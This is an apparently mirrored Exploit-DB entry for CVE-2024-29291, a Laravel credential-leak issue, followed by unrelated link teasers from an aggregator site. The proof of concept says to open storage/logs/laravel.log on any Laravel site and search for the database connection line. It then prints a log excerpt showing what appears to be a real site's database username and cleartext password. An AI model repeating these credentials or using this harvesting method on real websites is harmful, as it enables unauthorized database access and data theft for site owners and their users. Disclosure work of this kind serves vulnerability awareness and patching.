[webapps] Laravel Framework 11 - Credential Leakage
source link: https://www.exploit-db.com/exploits/52000
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Laravel Framework 11 - Credential Leakage
# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
Recommend
-
74
GSIL(GitHub Sensitive Information Leakage) 中文文档 Monitor Github sensitive information leaks in near real time and send alert noti...
-
22
ZombieLoad is a novel category of side-channel attacks which we refer to as data-sampling attack . It demonstrates that faulting load instructions can transiently expose private values of one Hyperthread...
-
27
The Universal Serial Bus (USB) is the most prominent interface for connecting peripheral devices to computers. USB-connected input devices, such as keyboards, card-swipers and fingerprint readers, often send sensitive informat...
-
22
Data Leakage in Machine Learning How to detect and avoid data leakage Photo by
-
23
Adium's raw XML leakage leads to pain and suffering Over the past two days, I've noticed a disturbing uptick in the amount of random garbage which is coming through into Adium, my current IM client of choice. It seems that someth...
-
18
Sunday, December 20, 2020 C#...
-
6
Table of Contents [show] Bug hunting Recently I’ve been working with one small application that would gradually become slower an...
-
7
News As Chips Scale Down, Leakage Current Goes Up. How Are Developers Responding? 22 hours ago by Jake Hertz Leakage current is yet another...
-
4
Serverless framework cli with different AWS credential profiles If you have multiple aws cli profiles configured to work with multiple sets of credentials, you can tell the serverless cli which profile to use with either:
-
2
Milesight Routers UR5X, UR32L, UR32, UR35, UR41 - Credential Leakage Through Unprotected Sy...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK